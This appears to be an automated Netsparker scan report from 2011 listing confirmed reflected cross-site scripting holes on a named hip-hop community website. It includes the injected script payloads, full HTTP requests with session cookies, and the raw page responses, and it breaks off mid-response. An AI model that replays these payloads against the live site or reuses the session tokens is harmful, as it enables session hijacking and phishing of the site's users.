Netsparker, Web Application Security Scanner

thatshiphop.com, SQL Injection REPORT SUMMARY

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.thatshiphop.com/blog.php'
SCAN DATE
4/17/2011 3:53:41 PM
REPORT DATE
4/17/2011 5:15:05 PM
SCAN DURATION
00:02:12

Total Requests

Average Speed

req/sec.
13
identified
10
confirmed
0
critical
0
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection, Boolean SQL Injection, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
62 %
LOW
38 %
Cross-site Scripting

Cross-site Scripting

7 TOTAL
IMPORTANT
CONFIRMED
7
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /news.php

/news.php CONFIRMED

http://www.thatshiphop.com/news.php?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x00000A)</script>

Request

GET /news.php?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00000A)%3C/script%3E HTTP/1.1
Referer: http://www.thatshiphop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; session=c45328a57aa32ba6b67dfcebbbfac11e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:10:27 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="keywords" content="hip hop, thats hiphop, hip-hop, hip, hop, rap, music, r n b, rnb, r&b, new, online, interviews, downloads, videos, profiles, community">
<meta name="description" content="ThatsHiphop is a hip hop community with thousands of users. Exclusive hip hop and RnB music, news, interviews, videos, profiles, forums, downloads and more!">
<meta name="verify-v1" content="AXu9lPdvlmO2z9IliUv7CNVGUqt541H3xPdJmJ5vKvY=" />
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26">
<link rel="alternate" type="application/rss+xml" title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33">
<script src="js/jquery.tools.min.js" type="text/javascript"></script>
<script src="js/jquery.qtip-1.0.0-rc3.js" type="text/javascript"></script>
<script src="js/home.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="css/style.css">
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="css/ie7.css"><![endif]-->
<title>ThatsHipHop.com - News</title>
</head>

<body>
<div id="page">
<div id="header-wrapper">
<div id="header">
<div id="utility-nav">
<ul class="menu">
<li><a href="index.php?page=register">Create Profile</a></li>
<li><a href="tags.php">Tags</a></li>
<li class="last">
<form action="search.php" method="get">
<input class="search_box" type="text" name="query">
<input class="search_btn" type="submit" value="Search">
</form>
</li>
</ul>
</div>

<div id="logo"><a href="/"><img src="/images/logo.png" width="180" height="190" border="0" alt="ThatsHiphop.com"></a></div>

<div id="adblock-top" class="adblock">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-9643032735294668";
/* 728x90, Generic All Pages */
google_ad_slot = "1105967903";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

<div id="pimary-nav-wrapper">
<div id="pimary-nav">
<ul class="menu">
<li class="first"><a href="/index.php?page=home">Home</a></li>
<li><a href="/news.php">News</a></li>
<li><a href="/browse.php?type=audio">Music</a></li>
<li><a href="/browse.php?type=video">Video</a></li>
<li><a href="/live/">Chat</a></li>
<li><a href="/jbrowse.php">People</a></li>
<li><a href="/artists.php">Artists</a></li>
<li><a href="/display_photos.php">Pics</a></li>
<li><a href="/interviews.php">Interviews</a></li>
<li class="last"><a href="/models.php">Models R US</a></li>
</ul>
</div>
</div>
</div>
</div>
<div id="main-wrapper">
<!-- LEFT SIDEBAR -->

<div id="content-left-wrapper">
<div id="content-left">
<div class="mod-left-wrap">
<div class="mod-left-inner">
<h2 class="title">ThatsHiphop.com News</h2>
<div class="mod-left">
<tr>
<td class="table2left">&nbsp; </td>
<td class="table2bg" valign="top">
<table width='530' cellspacing='10' cellpadding='10'><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21229'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/image.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21229' style='font-weight:bold;color:yellow;'>Krayzie Bone: No More Harmonizing With Bone...</a><br><br>Krayzie Bone has announced that he's leaving Bone Thugs n Harmony after 20 years to focus on his solo career and his label, The Life Entertainment. Krayzie's first project is a compilation titled Cleveland Is the City, Volume One, and it'll be on the stre... <a href='/story.php?id=21229' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21227'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/gucci-mane.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21227' style='font-weight:bold;color:yellow;'>Gucci Mane: It's Still Gucci Time Behind Ba...</a><br><br>No one has bailed Gucci Mane out of prison, even though his bond is only $5700. He's locked up in Atlanta for allegedly throwing a woman out of his car for rejecting his sexual advances last Friday. But even if he posts bail, he'll simply be transferred t... <a href='/story.php?id=21227' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21225'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/1_61_bobbybrown320.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21225' style='font-weight:bold;color:yellow;'>Bobby Brown: Child Number Six On The Way </a><br><br>Bobby Brown and fiancee Alicia Etheridge are expecting another baby. This will be child number six for Brown and his second with Alicia. He and Whitney Houston have just one daughter, Bobbi Christina. - Rahim Wright... <a href='/story.php?id=21225' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21222'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/mariah-carey.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21222' style='font-weight:bold;color:yellow;'>Mariah Carey: Bares All -- Yet Again </a><br><br>Just in case someone in the world hasn't seen Mariah Carey's bare, baby packed belly, she's showing it again - - on the cover of Britain's OK! magazine. Mimi tells the mag that hubby Nick Cannon has already started reading stories to the couple's unborn ... <a href='/story.php?id=21222' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21216'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/waka-flocka-flame.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21216' style='font-weight:bold;color:yellow;'>Waka Flocka: Gucci And Papoose On New Mixta...</a><br><br>Waka Flocka Flame has just dropped a new mixtape titled Benjamin Flocka.Surprisingly, there's no Lex Luger production this time around. Instead, Waka recruited Southside to man the boards for most of the project. The mixtape also includes features from th... <a href='/story.php?id=21216' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21214'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/nicki-minaj-2009-25-09-300x3002.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21214' style='font-weight:bold;color:yellow;'>Nicki Minaj: Channeling Marge Simpson </a><br><br>Nicki Minaj's latest wig looks rather cartoonish - - and that may be because she got the idea for the beehive look from Marge Simpson. Nicki tells People magazine, "Never did I think I would be rocking the Marge Simpson... I realize that she was cutting ... <a href='/story.php?id=21214' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21211'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/nicki-minaj-2009-25-09-300x300.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21211' style='font-weight:bold;color:yellow;'>Nicki Minaj: Channeling Marge Simpson </a><br><br>Nicki Minaj's latest wig looks rather cartoonish - - and that may be because she got the idea for the beehive look from Marge Simpson. Nicki tells People magazine, "Never did I think I would be rocking the Marge Simpson... I realize that she was cutting ... <a href='/story.php?id=21211' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21209'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/rihanna-2009-blue-dress.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21209' style='font-weight:bold;color:yellow;'>Rihanna, Eminem, Gaga: Billboard Awards Fin...</a><br><br>Rihanna leads all comers for next month's Billboard Awards. She's a finalist in 18 categories, including Top Hot 100 Artist and Top Female Artist. Eminem is up for 16 awards, and Lady Gaga is up for 12. Justin Bieber and Bruno Mars are finalists in 11 cat... <a href='/story.php?id=21209' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21206'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/beyonce_61.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21206' style='font-weight:bold;color:yellow;'>Beyonce: A Shot In The Dark </a><br><br>Beyonce is keeping people guessing about just what's going on with her new video, which she headed to California's Mojave Desert to shoot on Tuesday. Some sources say the clip is meant to accompany a song called "Girl," while others say it's for "Till the... <a href='/story.php?id=21206' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21203'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/teyanataylorforblackbeat3.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21203' style='font-weight:bold;color:yellow;'>Teyana Taylor: Accused Of Assault </a><br><br>Teyana Taylor is denying Internet reports that she assaulted another woman at a studio in Burbank, California on Saturday night. She writes on Twitter, "I'm being accused of something I didn't do." TMZ reports that Teyana allegedly laid a beat down on the... <a href='/story.php?id=21203' style='font-weight:bold;color:white;'>Read more</a></td></tr> </td>
<td class="table2right">&nbsp;</td>
</tr>

</table></td></tr></table><p><span style='padding:15px;background-color:#111111;'>1, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=2">2</a>, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=3">3</a>, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=4">4</a>, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=5">5</a>, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=6">6</a>, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=7">7</a>, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=8">8</a>, <a style='color:yellow;' href="/news.php?sextt='"--></style></script><script>netsparker(0x00000A)</script>&page=9">9</a> ... <a style='color:yellow;' href="news.php?page=26&sextt='"--></style></script><script>netsparker(0x00000A)</script>">26</a> ... <a href="news.php?page=2&sextt='"--></style></script><script>netsparker(0x00000A)</script>">Next</a> </span></p><p>&nbsp;</p> </div>
</div>
</div>
</div> </div><!-- RIGHT SIDEBAR --> <div id="content-right-wrapper"> <div id="content-right"> <div id="block-login" class="mod-right-wrap"> <div class="mod-right-inner"> <h2 class="title">THH Login </h2> <div class="mod-right"> <!-- LOGIN --> <div id="login-wrap"> <div class="login-block"> <a name="login"></a> <form id="login" action="http://www.thatshiphop.com/index.php?page=login" method="post"> <input type="hidden" name="action" value="authenticate" /> <input type="hidden" name="login_authenticate" value="LOGIN"/> <div id="login-elements"> <p><label for="user-name">User Name</label><input type="text" name="login_username" id="user-name"></p> <p style="clear:left;"><label for="password">Password</label><input type="password" name="login_password" id="password"></p> <p style="clear:left;" class="forgot-pass">forgot password [ <a href="/index.php?page=forgot_password">Click Here</a>]</p> </div> <p class="login-icons"><a class="icon-fb" href="javascript:void(0);" onmouseover="document.status='Login with Facebook';" onmouseout="document.status='';" onclick="location.href='https://www.facebook.com/login.php?api_key=158941227471070&cancel_url=http%3A%2F%2Fwww.thatshiphop.com%2Fnews.php%3Fnsextt%3D%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000A%2529%253C%252Fscript%253E&display=page&fbconnect=1&next=http%3A%2F%2Fwww.thatshiphop.com%2Fnews.php%3Fnsextt%3D%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x00000A%2529%253C%252Fscript%253E&return_session=1&session_version=3&v=1.0';">facebook</a> <a class="icon-twitter" href="javascript:void(0);" onmouseover="document.status='Login with Twitter';" onmouseout="document.status='';" onclick="location.href='/twitteroauth/redirect.php'">twitter</a> <input type="submit&quo..
- /news.php

/news.php CONFIRMED

http://www.thatshiphop.com/news.php?'"--></style></script><script>alert(0x000039)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000039)</script>

Request

GET /news.php?'"--></style></script><script>netsparker(0x000039)</script> HTTP/1.1
Referer: http://www.thatshiphop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; session=c45328a57aa32ba6b67dfcebbbfac11e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:10:34 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta name="keywords" content="hip hop, thats hiphop, hip-hop, hip, hop, rap, music, r n b, rnb, r&b, new, online, interviews, downloads, videos, profiles, community">
<meta name="description" content="ThatsHiphop is a hip hop community with thousands of users. Exclusive hip hop and RnB music, news, interviews, videos, profiles, forums, downloads and more!">
<meta name="verify-v1" content="AXu9lPdvlmO2z9IliUv7CNVGUqt541H3xPdJmJ5vKvY=" />
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com News" href="/press/?feed=rss2&cat=6">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Interviews" href="/press/?feed=rss2&cat=10">
<link rel="alternate" type="application/rss+xml" title="ThatsHiphop.com Models" href="/press/?feed=rss2&cat=26">
<link rel="alternate" type="application/rss+xml" title="Weekly Mixtapes" href="/press/?feed=rss2&cat=33">
<script src="js/jquery.tools.min.js" type="text/javascript"></script>
<script src="js/jquery.qtip-1.0.0-rc3.js" type="text/javascript"></script>
<script src="js/home.js" type="text/javascript"></script>
<link rel="stylesheet" type="text/css" href="css/style.css">
<!--[if IE 7]><link rel="stylesheet" type="text/css" href="css/ie7.css"><![endif]-->
<title>ThatsHipHop.com - News</title>
</head>

<body>
<div id="page">
<div id="header-wrapper">
<div id="header">
<div id="utility-nav">
<ul class="menu">
<li><a href="index.php?page=register">Create Profile</a></li>
<li><a href="tags.php">Tags</a></li>
<li class="last">
<form action="search.php" method="get">
<input class="search_box" type="text" name="query">
<input class="search_btn" type="submit" value="Search">
</form>
</li>
</ul>
</div>

<div id="logo"><a href="/"><img src="/images/logo.png" width="180" height="190" border="0" alt="ThatsHiphop.com"></a></div>

<div id="adblock-top" class="adblock">
<script type="text/javascript"><!--
google_ad_client = "ca-pub-9643032735294668";
/* 728x90, Generic All Pages */
google_ad_slot = "1105967903";
google_ad_width = 728;
google_ad_height = 90;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
</div>

<div id="pimary-nav-wrapper">
<div id="pimary-nav">
<ul class="menu">
<li class="first"><a href="/index.php?page=home">Home</a></li>
<li><a href="/news.php">News</a></li>
<li><a href="/browse.php?type=audio">Music</a></li>
<li><a href="/browse.php?type=video">Video</a></li>
<li><a href="/live/">Chat</a></li>
<li><a href="/jbrowse.php">People</a></li>
<li><a href="/artists.php">Artists</a></li>
<li><a href="/display_photos.php">Pics</a></li>
<li><a href="/interviews.php">Interviews</a></li>
<li class="last"><a href="/models.php">Models R US</a></li>
</ul>
</div>
</div>
</div>
</div>
<div id="main-wrapper">
<!-- LEFT SIDEBAR -->

<div id="content-left-wrapper">
<div id="content-left">
<div class="mod-left-wrap">
<div class="mod-left-inner">
<h2 class="title">ThatsHiphop.com News</h2>
<div class="mod-left">
<tr>
<td class="table2left">&nbsp; </td>
<td class="table2bg" valign="top">
<table width='530' cellspacing='10' cellpadding='10'><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21229'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/image.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21229' style='font-weight:bold;color:yellow;'>Krayzie Bone: No More Harmonizing With Bone...</a><br><br>Krayzie Bone has announced that he's leaving Bone Thugs n Harmony after 20 years to focus on his solo career and his label, The Life Entertainment. Krayzie's first project is a compilation titled Cleveland Is the City, Volume One, and it'll be on the stre... <a href='/story.php?id=21229' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21227'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/gucci-mane.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21227' style='font-weight:bold;color:yellow;'>Gucci Mane: It's Still Gucci Time Behind Ba...</a><br><br>No one has bailed Gucci Mane out of prison, even though his bond is only $5700. He's locked up in Atlanta for allegedly throwing a woman out of his car for rejecting his sexual advances last Friday. But even if he posts bail, he'll simply be transferred t... <a href='/story.php?id=21227' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21225'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/1_61_bobbybrown320.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21225' style='font-weight:bold;color:yellow;'>Bobby Brown: Child Number Six On The Way </a><br><br>Bobby Brown and fiancee Alicia Etheridge are expecting another baby. This will be child number six for Brown and his second with Alicia. He and Whitney Houston have just one daughter, Bobbi Christina. - Rahim Wright... <a href='/story.php?id=21225' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21222'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/mariah-carey.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21222' style='font-weight:bold;color:yellow;'>Mariah Carey: Bares All -- Yet Again </a><br><br>Just in case someone in the world hasn't seen Mariah Carey's bare, baby packed belly, she's showing it again - - on the cover of Britain's OK! magazine. Mimi tells the mag that hubby Nick Cannon has already started reading stories to the couple's unborn ... <a href='/story.php?id=21222' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21216'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/waka-flocka-flame.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21216' style='font-weight:bold;color:yellow;'>Waka Flocka: Gucci And Papoose On New Mixta...</a><br><br>Waka Flocka Flame has just dropped a new mixtape titled Benjamin Flocka.Surprisingly, there's no Lex Luger production this time around. Instead, Waka recruited Southside to man the boards for most of the project. The mixtape also includes features from th... <a href='/story.php?id=21216' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21214'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/nicki-minaj-2009-25-09-300x3002.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21214' style='font-weight:bold;color:yellow;'>Nicki Minaj: Channeling Marge Simpson </a><br><br>Nicki Minaj's latest wig looks rather cartoonish - - and that may be because she got the idea for the beehive look from Marge Simpson. Nicki tells People magazine, "Never did I think I would be rocking the Marge Simpson... I realize that she was cutting ... <a href='/story.php?id=21214' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21211'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/nicki-minaj-2009-25-09-300x300.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21211' style='font-weight:bold;color:yellow;'>Nicki Minaj: Channeling Marge Simpson </a><br><br>Nicki Minaj's latest wig looks rather cartoonish - - and that may be because she got the idea for the beehive look from Marge Simpson. Nicki tells People magazine, "Never did I think I would be rocking the Marge Simpson... I realize that she was cutting ... <a href='/story.php?id=21211' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21209'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/rihanna-2009-blue-dress.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21209' style='font-weight:bold;color:yellow;'>Rihanna, Eminem, Gaga: Billboard Awards Fin...</a><br><br>Rihanna leads all comers for next month's Billboard Awards. She's a finalist in 18 categories, including Top Hot 100 Artist and Top Female Artist. Eminem is up for 16 awards, and Lady Gaga is up for 12. Justin Bieber and Bruno Mars are finalists in 11 cat... <a href='/story.php?id=21209' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21206'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/beyonce_61.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21206' style='font-weight:bold;color:yellow;'>Beyonce: A Shot In The Dark </a><br><br>Beyonce is keeping people guessing about just what's going on with her new video, which she headed to California's Mojave Desert to shoot on Tuesday. Some sources say the clip is meant to accompany a song called "Girl," while others say it's for "Till the... <a href='/story.php?id=21206' style='font-weight:bold;color:white;'>Read more</a></td></tr><tr><td align='center' valign='top' bgcolor='#444444'><a href='/story.php?id=21203'><img src='http://www.thatshiphop.com/pthumbs/4/88/88/2011/04/teyanataylorforblackbeat3.jpeg' style='border:1px solid white;'></a></td><td valign='top' align='left'><a href='/story.php?id=21203' style='font-weight:bold;color:yellow;'>Teyana Taylor: Accused Of Assault </a><br><br>Teyana Taylor is denying Internet reports that she assaulted another woman at a studio in Burbank, California on Saturday night. She writes on Twitter, "I'm being accused of something I didn't do." TMZ reports that Teyana allegedly laid a beat down on the... <a href='/story.php?id=21203' style='font-weight:bold;color:white;'>Read more</a></td></tr> </td>
<td class="table2right">&nbsp;</td>
</tr>

</table></td></tr></table><p><span style='padding:15px;background-color:#111111;'>1, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=2">2</a>, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=3">3</a>, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=4">4</a>, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=5">5</a>, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=6">6</a>, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=7">7</a>, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=8">8</a>, <a style='color:yellow;' href="/news.php?"--></style></script><script>netsparker(0x000039)</script>=&page=9">9</a> ... <a style='color:yellow;' href="news.php?page=26&"--></style></script><script>netsparker(0x000039)</script>=">26</a> ... <a href="news.php?page=2&"--></style></script><script>netsparker(0x000039)</script>=">Next</a> </span></p><p>&nbsp;</p> </div>
</div>
</div>
</div> </div><!-- RIGHT SIDEBAR --> <div id="content-right-wrapper"> <div id="content-right"> <div id="block-login" class="mod-right-wrap"> <div class="mod-right-inner"> <h2 class="title">THH Login </h2> <div class="mod-right"> <!-- LOGIN --> <div id="login-wrap"> <div class="login-block"> <a name="login"></a> <form id="login" action="http://www.thatshiphop.com/index.php?page=login" method="post"> <input type="hidden" name="action" value="authenticate" /> <input type="hidden" name="login_authenticate" value="LOGIN"/> <div id="login-elements"> <p><label for="user-name">User Name</label><input type="text" name="login_username" id="user-name"></p> <p style="clear:left;"><label for="password">Password</label><input type="password" name="login_password" id="password"></p> <p style="clear:left;" class="forgot-pass">forgot password [ <a href="/index.php?page=forgot_password">Click Here</a>]</p> </div> <p class="login-icons"><a class="icon-fb" href="javascript:void(0);" onmouseover="document.status='Login with Facebook';" onmouseout="document.status='';" onclick="location.href='https://www.facebook.com/login.php?api_key=158941227471070&cancel_url=http%3A%2F%2Fwww.thatshiphop.com%2Fnews.php%3F%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000039%2529%253C%252Fscript%253E%3D&display=page&fbconnect=1&next=http%3A%2F%2Fwww.thatshiphop.com%2Fnews.php%3F%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000039%2529%253C%252Fscript%253E%3D&return_session=1&session_version=3&v=1.0';">facebook</a> <a class="icon-twitter" href="javascript:void(0);" onmouseover="document.status='Login with Twitter';" onmouseout="document.status='';" onclick="location.href='/twitteroauth/redirect.php'">twitter</a> <input type="submit" id="submit" class="button" value="">..
- /display_photos.php

/display_photos.php CONFIRMED

http://www.thatshiphop.com/display_photos.php?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x000070)</script>

Request

GET /display_photos.php?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000070)%3C/script%3E HTTP/1.1
Referer: http://www.thatshiphop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.thatshiphop.com
Cookie: PHPSESSID=8d93c2964af28ee924e0ba3b856a4444; session=c45328a57aa32ba6b67dfcebbbfac11e
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 20:11:01 GMT
Server: Apache/2.2.14 (Unix) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


<html>
<head>
<title>Hip Hop, News, Honeys, Friends, Community, Exclusive Music, Upload Video, Hip Hop Interviews - Thats Hip Hop</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon" />
<style type="text/css">
body,td {
font-family:Verdana,Helvetica;
font-size:11px;
font-weight:normal;
color:white;
}
a:link {
color:yellow;
}
a:visited {
color:yellow;
}
a:hover {
color:white;
}
.topnews_text {
font-size:9px;
}
.topnews_text_header {
font-weight:bold;

}
.newmusic_text {
font-family:Verdana,Helvetica;
font-size:11px;
font-weight:bold;
color:black;
}
.topsongs_header {
font-weight:bold;
color: black;
}
body,div {
scrollbar-face-color : #333333;
